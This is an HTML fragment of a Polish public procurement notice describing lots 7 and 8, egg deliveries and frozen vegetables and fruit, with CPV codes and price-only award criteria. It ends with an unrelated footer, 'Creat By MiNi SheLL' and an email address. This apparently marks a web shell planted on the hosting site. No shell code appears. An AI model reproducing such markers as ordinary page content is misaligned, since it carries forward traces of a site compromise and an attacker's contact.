                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zadanie Nr7<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 7  dostawy  jaj  zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 8 do SIWZ. Dostawy dotyczą artykułów :
  - jaja (CPV  03142500-3) : jaj kurzych.

    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 8 (formularzu
    cenowym zadania Nr 7).<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 03142500-3,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Zadanie Nr 8<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zadanie Nr 8  dostawy mrożonek zgodnie z formularzem cenowym
    stanowiącym  Zał. Nr 9 do SIWZ. Dostawy dotyczą artykułów :
  - warzywa mrożone (CPV 15331100-8) : mieszanki warzywnej, marchwi kostka, marchwi 
    z groszkiem, kalafiora, fasolki szparagowej,
  - owoce przetworzone (CPV 15332100-5) : mieszanki kompotowej mrożonej, truskawek  
    mrożonych.
    Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 9 (formularzu
    cenowym zadania Nr 8). <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15000000-8, 15331100-8,
                    15332100-5,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com